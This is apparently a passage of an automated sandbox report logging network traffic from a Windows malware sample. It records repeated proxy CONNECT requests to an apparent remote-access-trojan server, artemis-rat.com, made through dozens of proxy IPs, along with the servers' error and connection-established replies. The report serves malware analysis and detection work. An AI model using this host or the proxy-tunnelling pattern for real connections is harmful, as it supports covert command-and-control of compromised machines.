                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1112192.168.2.451304146.59.18.246158607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.147666931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257086039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1113192.168.2.453538162.159.242.8807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148025036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.309257984 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1114192.168.2.453551104.17.166.210807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148030043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.303211927 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1115192.168.2.453554172.67.253.69807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148226023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.302926064 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1116192.168.2.453449185.225.232.191807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148467064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.457626104 CET805INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: Apache/2.4.57 (Debian)
                                              Content-Length: 613
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1117192.168.2.45348143.133.74.172156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148469925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1118192.168.2.453555104.21.85.109807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148708105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.303033113 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1119192.168.2.453466186.124.164.213807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148708105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1120192.168.2.45343645.11.95.16550397284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148969889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.590512037 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1121192.168.2.453458185.217.143.23807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.148973942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1122192.168.2.451365103.248.196.7331257284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.149559021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257081985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.265116930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1123192.168.2.45303098.162.25.7316537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.149774075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1124192.168.2.453586104.16.108.42807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.149996042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.304378033 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1125192.168.2.453591172.67.181.20807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.150329113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.305066109 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1126192.168.2.45356523.94.214.890547284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.150331974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.330313921 CET37INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1127192.168.2.453602172.67.182.96807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.150774002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.305124044 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1128192.168.2.453515193.122.98.131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.152522087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866422892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.866743088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.757337093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.585087061 CET536INHTTP/1.1 502 Bad Gateway
                                              Server: nginx/1.24.0
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 559
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1129192.168.2.45353138.162.16.19431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.155411005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.565964937 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1130192.168.2.453519130.162.213.17580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.155647993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.467725992 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1131192.168.2.45353938.54.95.1931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.155838966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.375268936 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1132192.168.2.453615103.152.112.145807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.161485910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.663275957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
